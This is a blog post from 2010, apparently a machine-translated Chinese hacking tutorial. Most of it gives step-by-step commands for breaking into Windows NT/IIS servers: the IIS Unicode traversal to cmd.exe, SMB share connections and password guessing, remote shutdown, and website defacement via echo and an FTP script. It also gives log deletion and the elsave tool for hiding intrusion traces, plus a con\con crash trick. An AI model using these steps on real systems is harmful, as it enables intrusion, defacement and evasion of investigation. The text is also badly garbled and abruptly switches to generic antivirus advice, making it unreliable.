Tuesday, December 14, 2010

【 Weak current College 】 LAN computer settings for the exchange of visits (2)


6:set
If you run into a camera, but would like to black he (this thought can only be used in particular when allowed), when
So he's 80 port to open, otherwise you black to show someone. You need to use the SET command!
Here are my results, I can analyze it, only to find that home page.
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST = current login user IP, there would have to show my IP, I delete
The
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE5.0;
Windows98;
DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;. EXE;. BAT;. CMD
PATH_TRANSLATED = E:\vlroot home page in the address, as long as you can see
Behind the PATH_TRANSLATED = is the home page of the store address. Here is the E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86Family6Model3Stepping3,
GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=\$P\$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/.. %2f.. /winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE = Microsoft-IIS/3.0 each other using IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\DefaultUser
windir=D:\WINNT
Pink line is the other home store address, here tell you a skill, stupid trick
Ah, but you can only use this method to 100% find the name of the home page, when you the directory DIR
Will see a lot of files, you can put all the files in the browser so enter XX.XX.XX.XX/
The file name, such as long as you can see and XX.XX.XX.XX see also face the same, then this is the mainbr>The name of the page.
7:nbtstat
If you scan to a NT's camera, his 136 to 139 one port open, use the
A command from the user. By the way, tell them this is the netbios name, you can guess what
The password. For example, compare a simple password, password and user name of the same, try, no violence
Crack! now online many NT loom open these ports, you can practice, we
Analysis of the results obtained. Command is nbtstat-AXX.XX.XX.XX-A must capitalize Oh. This
I think the big do not capitalize and do not have much difference, is still the same. After the IP with netuse\\ each other
Connect the other IP! netview\\ view each other's shared folder netuseX [url = file://\\IP\] \\IP\ [/url]
Party shared file Ying \ * other shared folders into native x disk that is essential to use port 139
But the premise is that method must be the other open sharing!
Netstat-n see who is connected to your
Here are the results obtained.
NetBIOSRemoteMachineNameTable
NameTypeStatus
---------------------------------------------
RegisteredRegisteredRegisteredRegisteredRegistered
Registered
RegisteredReg
isteredRegisteredRegisteredRegistered
MACAddress=00-E0-29-14-35-BA
PENTIUMII<00>UNIQUE
PENTIUMII<20>UNIQUE
ORAHOTOWN<00>GROUP
ORAHOTOWN<1C>GROUP
ORAHOTOWN<1B>UNIQUE
PENTIUMII<03>UNIQUE
INet~Services<1C>GROUP
IS~PENTIUMII...<00>UNIQUE
ORAHOTOWN<1E>GROUP
ORAHOTOWN<1D>UNIQUE
.. __MSBROWSE__.<01>GROUP
Pink is landing have seen this system user, you may not know how to look at, it is not
A breakthrough digital, as long as this breakthrough digital is <03>, he is on the front of the user.
The user is a PENTIUMII here.
No 03 Description: MAC didn't and IP bundle together
8:Shutdown
Off each other's NT Server command
Shutdown [url = file://\\IP] \\IP [/url] address t:20
20 seconds will turn off automatically, NT will think twice before you run this command on each other's make great loss
To be a conscientious intruders.
Telnet in a command or a local what software reset each other computer
Shutdown-m\\ computer name can remotely restart or shut down
9:DIR
This command have nothing to say, but very important, he is viewing a list of all files, text
Metal clips. You can try local.
10: echo famous vulnerability Unicode, this command can be a simple black about the vulnerability of the main
Machine. We assume that we want to put the "Nanjing massacre is ironclad, any person shall not deny Japan!" wrote
In index.htm, and there are 2 methods, we look at what's the difference. Echo evidence such as Nanjing massacre
Hill, any person shall not deny Japan! > index.htmecho the Nanjing massacre is ironclad, any
Japan may not deny! >> index.htm first mean overwriting existing content index.htm
The "Nanjing massacre is ironclad, any person shall not deny Japan!" in the index.htm. The
The second point is whether the "Nanjing massacre, any person shall not deny Japan!" to the
Index.htm. "The contents of >>" will be appended to the file, ">" in the original file
Volume coverage. Here explain, <和> is redirect command just one input is redirected to another
The output is redirected, for example, we at the command prompt displays the mean c:\ > is the C disk
Order weight directed to us, the same: it is redirected command also known as a pipe, it is used to connect two
A command in the pipeline, first execute commands on the left side of the pipe, and then do one of the pipeline right of command, but I am
No ability to DOS command that understand, want to buy this dos encyclopedia see, enough to look at the half-year.
You can try local.
Perhaps you will ask, so simple black down what's there to do, in fact, he can use to download the home page to the other
Directory.
1. first of all, we need to applyfor a free home page space.
2, with echo in a writable directory created the following txt file: (in case of chinren Server
。 )
Openupload.chinaren.com (your FTP server, application, your space provider to
Your)
Cnhack (your application's user name)
Test (when you apply for password)
getindex.htm
C:\inetpub\wwwroot\index.htm (this is your space to index.htm downloads
Party c:\inetpub\wwwroot\index.htm)
Bye (exit FTP dialogue, equivalent in Win98 DOS, use EXIT to exit the DOS)
Specific practices:
Enter echoopenupload.chinaren.com > c:\cnhack.txt
Enter echocnhack >> c:\cnhack.txt
Enter echo39abs >> c:\cnhack.txtR > enter echogetindex.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
Finally enter the ftp-s:c: \cnhack.txt (use the-s parameter to ftp, file
In the content. ), The command is complete, the file has been downloaded to your specified file.
Note: access to documents, delete cnhack.txt. (If you do not delete, you can easily
To see your password. )
Remember to delc: \cnhack.txt
11: attrib command is set file attributes. If you want a black one station, but he's home page
File attributes to set a read-only, it is very poor, would like to remove him or not, would like to cover him.
Down there this command but don't be afraid of.
Attrib-rindex.htm This command is to remove the read-only attribute of index.htm. If you put "
-"To" + "is the file attribute is set to read only the attrib + rindex.htm
Command is index.htm property is set to read-only. Attrib command to be used to check the property,
Such as attrib filename so that it displays the file's properties, it has more than R this property
Actually there are four types of property, a file attribute r read-only property h implied attribute s system properties, I
Who would like to use which is which, I think we have uploaded a file with a suppressed attributes more interesting,,
That, and continueto pick posted wrong .12: del when you see the title don't fall! now you want to leave
127.0.0.1, you want to delete the log, and, of course, you want to delete the logs! want to be caught? Hehe.
NT log has these
delC:\winnt\system32\logfiles\*.*
delC:\winnt\ssytem32\config\*.evt
delC:\winnt\system32\dtclog\*.*
delC:\winnt\system32\*.log
delC:\winnt\system32\*.txt
delC:\winnt\*.txt
delC:\winnt\*.log
Just delete them. Some systems NT installed on the D disk or other disk, C into other
Spare.
Internet information services FTP log default location:%systemroot%\system32
\Logfiles\msftpsvc1\, default daily a log Internet Information Services log default WWW
Location:%systemroot%\system32\logfiles\w3svc1\, default daily a log
Scheduler service logs to the default location:%systemroot%\schedlgu.txt
The above log in key in the registry: application log, security log, System log
The DNS server log, the LOG files in them in the registry:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog have
The administrator is likely to relocate these logs. Which the EVENTLOG following many of the child table, inside
Can be found above the log directory location.
Schedluler service log in the registry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
Del is deleted the file, the log also does log file type, but above this method
It is not possible to clean up your own log, because the system automatically running log records, you do this
Some time it has been in the record, has not stopped, we all will often see, sometimes deleting a file
Prompting system is holding denies deleting, huh, huh, this will understand that the system is running in the East
West has resident memory, of course, cannot delete away, everyone is afraid of it, so don't delete the equal to help
People clean up the log, not to delete their own share of Ah, hahahaha, asking me how to clean up, I just said that
Or use xiaorong's tools to clear it, the quicker and better, we need to use those cumbersome command line
Yet, in particular to growth in windows desktop actions of people that obviously is too much trouble, I recommend small
Yung elsave tools, cleaning log quick and clean, saving electricity, hee hee, I am not advertising
Come.
With the help of a third-party tools such as xiaorong's elsave.exe remote cleanup
Security system, applicaton, software
Use is very simple, first use the administrator account and each other to establish a session, the ipc netuse
[url=file://\\ip]\\ip[/url]pass/user:user
And then the command line: elsave-s [url = file://\\ip] \\ip [/url]-lapplication-C,This will remove the security
Log.
In fact, use of this software can also be backed up log, simply add a parameter to the-ffilename
To, in this no longer dwell.
LAN to others panic? he opened the shared c drive (win98, and there is no patch), you are in DOS
The following input
\\ His IP or machine name \c\con\con
Let the impregnable to the PC, PC IX security policy
First, kill the (anti) essential free software
Virus attack to a global computer system caused tremendous losses, so that people talk about "toxic" reasons. Internet access
People, there are very few who haven't been viruses too. For general users and Yutaka? purple petticoat? see large wooden faded beauty?
Garden rake hand soaks Cangzhou? Han na times saved calendars?? Other degree Ying Qiao times saved calendars? 005 version "," drug tyrants 2005 "
And so on.
Now many people have mistaken the antivirus, is the key to dealing with computer viruses is "killed", its
Real deal with computer viruses should be mainly in "defense". At present, the vast majority of antivirus software are in play "
The role of the wise ", that is, after the computer is infected with a virus before shouting to discover, share
Analysis and treatment. This passive defense of passive mode is not completely solve the problem of computer security. Antivirus
Software should be based on a computer virus to rejection. It should therefore be installed antivirus real-time monitoring program
That should periodically upgrade the installed anti-virus software (if you are installing the Internet Edition, the installation may be
It is set to automatically upgrade), to the operating system to play the corresponding patches, upgrades, engine and virus definitions. By
To the emergence of new viruses emerging, now the antivirus manufacturer's virus database updates are frequent, should
When setting the daily scheduled update antivirus real-time monitoring of virus database to ensure its ability to withstand latest out
Of virus attacks.
Each week on the computer to carry out a comprehensive antivirus, scan jobs, in order to discover and remove hidden in
The system for viruses. When a user accidentally infected with viruses, you should immediately upgrade to the latest anti-virus software.
Version, and then scan the entire hard disk, clear the virus killing all can. If the virus
Not clear, or antivirus software cannot do on virus body for clear identification of the disease, you should
Drugs submitted to the antivirus company, anti-virus companies generally will soon give users satisfied reply
。 In the face of network attacks, our first reaction should be unplugged from the network connection ports, or press the
Antivirus software on the disconnected from the network button.
Second, the irreplaceable personal firewall
If you have a condition, install a personal firewall (FireWall) to protect against hackers attacks. The so-called "
Firewall ", refers to an intranet and public access network (Internet) method, in fact
Is a kind of isolation technology. A firewall is in two network communication implementation of an access control measure, it
To allow you "agree" and the data into your network, you do not agree "," number ofpeople and
It was turned away, prevent network hackers to access your network, to prevent them from changing the
, Copy, damage your important information. Firewall installation and put into use, not to boil the ocean. You want to
To fully play its role of security, you must track and maintain, to maintain with businessmen and dense
Cut ties, always looking for dynamic businesses. Because business as soon as you discover security vulnerabilities in their products,
It will soon publish the remediation (Patch) product, you should verify authenticity, such as preventing Trojan horses (
Virus), and on the firewall for the update. Ideally, a good firewall should be the
Security issues to be resolved before the occurrence. The real situation, this is still a distant dream. At present the
Home antivirus software manufacturers will provide Personal Edition firewall software, antivirus software, anti-containing personal
Behind a firewall, so available to run on the same disc, with a focus on personal firewall installation prompt after installing Firewall
Essential needs more configuration. Reasonable set behind a firewall should be able to prevent most of the worm into
Transgression.

No comments:

Post a Comment